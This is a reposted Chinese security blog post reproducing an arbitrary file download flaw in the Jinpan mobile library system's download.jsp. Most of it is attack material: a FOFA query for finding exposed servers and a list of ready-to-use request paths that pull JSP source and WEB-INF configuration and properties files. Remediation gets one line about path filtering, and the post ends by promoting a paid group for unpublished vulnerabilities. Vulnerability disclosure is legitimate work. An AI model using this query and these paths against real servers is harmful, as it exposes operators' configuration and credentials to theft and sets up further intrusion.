导读
主要分享学习日常中的web渗透,内网渗透、漏洞复现、工具开发相关等。希望以技术共享、交流等不断赋能自己,为网络安全发展贡献自己的微薄之力!
金盘移动图书馆系统 download.jsp 任意文件下载,攻击者可通过此漏洞获取敏感信息,从而为下一步攻击做准备。
1、fofa
body="//分词检索字段"
2、部分界面如下
3、直接下载隐患源码文件,poc如下
/pages/admin/tools/file/download.jsp?items=/pages/admin/tools/file/download.js
4、下载其他文件如下
/pages/admin/tools/file/download.jsp?items=/WEB-INF/web.xml
/pages/admin/tools/file/download.jsp?items=/WEB-INF/flex/proxy-config.xml
/pages/admin/tools/file/download.jsp?items=/WEB-INF/flex/services-config.xml
/pages/admin/tools/file/download.jsp?items=/WEB-INF/flex/remoting-config.xml
/pages/admin/tools/file/download.jsp?items=/WEB-INF/flex/messaging-config.xml
/pages/admin/tools/file/download.jsp?items=/WEB-INF/flex/data-management-config.xml
/pages/admin/tools/file/download.jsp?items=/WEB-INF/classes/lcatalina.properties
/pages/admin/tools/file/download.jsp?items=/WEB-INF/classes/application.properties
1、对下载路径进行过滤,如下载前对传入的参数进行过滤,并且对下载文件类型进行检查,是否是允许下载的类型,另外禁止使用回溯符../!
因为很多未公开或者小范围公开的漏洞不能直接发公众号,所以后面部分漏洞会直接整理发表在知识大陆,持续更新,目前进入需要9.9元(收费主要是想参与freebuf知识大陆活动),链接如下:
https://wiki.freebuf.com/front/societyFront?invitation_code=2f34044b&society_id=107&source_data=2
加入帮会后扫描二维码加入群聊(有问题后台留言):
京信通信系统中国有限公司CPE-WiFi存在任意用户添加&命令执行
泛微e-office OfficeServer2.php 存在任意文件读取漏洞复现
原文始发于微信公众号(五六七安全团队):金盘移动图书馆系统 download.jsp 任意文件下载
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论